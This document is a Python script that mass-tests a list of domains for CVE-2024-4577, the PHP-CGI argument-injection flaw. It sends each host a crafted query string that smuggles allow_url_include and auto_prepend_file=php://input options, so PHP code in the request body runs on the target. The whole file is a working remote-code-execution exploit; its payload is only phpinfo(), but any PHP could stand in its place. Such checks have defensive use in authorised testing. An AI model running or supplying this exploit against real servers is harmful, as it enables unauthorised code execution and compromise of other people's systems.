CVE-2024-4577.py

import requests
import threading
import sys
import argparse

max_threads = 10
semaphore = threading.Semaphore(max_threads)

def check_vulnerability(domain, quiet):
    url = f"{domain}/test.hello?%25ADd+allow_url_include%3D1+%25ADd+auto_prepend_file%3Dphp://input"
    headers = {
        "User-Agent": "curl/8.3.0",
        "Accept": "*/*",
        "Content-Type": "application/x-www-form-urlencoded",
        "Connection": "keep-alive"
    }
    data = "<?php phpinfo(); ?>"
    if not quiet:
        print(f"[!] Testing {domain}...")
        print("")
    try:
        response = requests.post(url, headers=headers, data=data, timeout=10, verify=False)
        if "PHP Version" in response.text:
            print(f"{domain}: Vulnerable")
        elif not quiet:
            print(f"{domain}: Not Vulnerable")
    except requests.RequestException as e:
        if not quiet:
            print(f"{domain}: Error making request: {e}")
    finally:
        semaphore.release()

def main(file_path, quiet):
    threads = []
    with open(file_path, 'r') as file:
        for line in file:
            domain = line.strip()
            if domain:
                semaphore.acquire()
                thread = threading.Thread(target=check_vulnerability, args=(domain, quiet))
                thread.start()
                threads.append(thread)
    for thread in threads:
        thread.join()

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description="Check for CVE-2024-4577 vulnerability.")
    parser.add_argument("file_path", help="Path to the domain list file")
    parser.add_argument("--quiet", action="store_true", help="Only print if the host is vulnerable")
    args = parser.parse_args()

    main(args.file_path, args.quiet)